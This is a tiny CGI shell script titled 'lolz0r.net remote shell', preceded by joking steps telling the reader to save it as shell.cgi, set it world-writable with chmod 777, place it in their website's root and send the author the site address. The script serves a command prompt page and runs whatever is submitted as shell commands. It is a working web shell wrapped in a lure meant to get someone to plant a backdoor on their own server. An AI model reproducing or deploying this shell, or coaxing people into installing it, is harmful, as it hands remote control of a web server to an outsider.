1) save as shell.cgi
2) chmod 777 shell.cgi
3) place in root directory of website
4) give me your web adress
5) ???
6) profit!
echo Content-type: text/html
echo ""
/bin/cat << EOM1
<HTML>
<link rel="stylesheet" type="text/css" href="
http://lolz0r.net/css/terro
r.css" title="Terror">
<HEAD><TITLE>lolz0r.net remote shell</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#00ff00">
<HR SIZE=1>
<P>
<ISINDEX prompt="enter command: " action="
http://localhost/cgi-bin/isindex-sea
rch">
<P>
EOM1
/bin/cat << EOM2
<P>
<PRE>
EOM2
$*
/bin/cat << EOM3
</PRE>
<P>
</BODY>
</HTML>
EOM3